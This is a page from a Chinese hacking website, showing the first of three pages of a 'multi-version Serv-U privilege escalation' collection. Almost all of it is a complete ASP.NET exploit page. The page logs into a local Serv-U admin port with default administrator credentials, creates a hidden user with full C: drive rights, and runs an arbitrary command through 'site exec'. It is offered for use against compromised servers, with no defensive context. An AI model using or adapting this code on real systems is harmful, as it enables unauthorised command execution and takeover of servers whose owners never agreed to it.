黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 黑软介绍 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]多版本集合Serv-U提权程序
      ★★★★★

多版本集合Serv-U提权程序

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-1-8 9:55:38

1..NET版本Serv-U提权程序

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

    ' 
    ' Love, Where are you ?
    
    Sub BTN_Start_Click(sender As Object, e As EventArgs)
        Dim Usr As String = Text_Name.Text
        Dim pwd As String = Text_PWD.Text
        Dim Port As Int32 = Text_Port.Text
        Dim Command As String = Text_cmd.Text
    
        Dim LoginUser As String = "User " & Usr & vbcrlf
        Dim LoginPass As String = "Pass " & pwd & vbcrlf
        Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
        Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
        Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
                    "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
                    "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
                    "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
                    "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
                    "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
                    "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
        Dim Quit As String = "QUIT" & vbcrlf
        Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
    
        'Dim client As New TcpClient
        Dim tcpClient As New TcpClient()
        Try
            tcpClient.Connect("127.0.0.1", port)
        Catch eee As Exception
            response.write(eee.ToString())
            response.end
        End Try
        tcpClient.ReceiveBufferSize = 1024
        Dim networkStream As NetworkStream = tcpClient.GetStream()
        Rec(networkStream)
        Send(networkStream, LoginUser)
        Rec(networkStream)
        Send(networkStream, LoginPass)
        Rec(networkStream)
        Send(networkStream, MAINTENANCE)
        Rec(networkStream)
        Send(networkStream, DelDomain)
        Rec(networkStream)
        Send(networkStream, NewDomain)
        Rec(networkStream)
        Send(networkStream, NewUser)
        Rec(networkStream)
               Dim tcpClient2 As New TcpClient()
               Try
                   tcpClient2.Connect("127.0.0.1", 43859)
               Catch eee As Exception
                   response.write(eee.ToString())
                   response.end
               End Try
               tcpClient2.ReceiveBufferSize = 1024
               Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
               Rec(networkStream2)
               Send(networkStream2, "User lake" & vbcrlf)
               Rec(networkStream2)
               Send(networkStream2, "pass admin123" & vbcrlf)
               Rec(networkStream2)
               Send(networkStream2, "site exec " & Command & vbcrlf)
               Rec(networkStream2)
               tcpClient2.Close()
        Send(networkStream, DelDomain)
        Rec(networkStream)
        Send(networkStream, Quit)
        Rec(networkStream)
        tcpClient.Close()
    End Sub
    
    
    
    Sub Rec(o As Object)
       If o.CanRead Then
          Dim bytes(1024) As Byte
          o.Read(bytes, 0, 1024)
          Dim returndata As String = Encoding.ASCII.GetString(bytes)
          response.Write("out:" & returndata & "<br>")
       Else
          response.Write("What's wrong ?")
       End If
    End Sub
    
    Sub Send(o As Object,data As String)
       If o.CanWrite Then
          Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
          o.Write(sendBytes, 0, sendBytes.Length)
          response.write("in: " & data & "<br>")
       Else
          response.Write("What's wrong ?")
       End If
    End Sub

</script>
<html>
<head>
</head>
<body>
    <form runat="server">
        <p>
            <asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
            admin by lake2</asp:Label>
        </p>
        <p>
            <asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
            <asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
            <br />
            <asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
            <asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
            <br />
            <asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
            <asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
            <br />
            <asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
            <asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
        </p>
        <p>
            <asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
        </p>
        <p>
            <hr />
            <!-- Insert content here -->
        </p>
    </form>
</body>
</html>

[1] [2] [3] 下一页

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886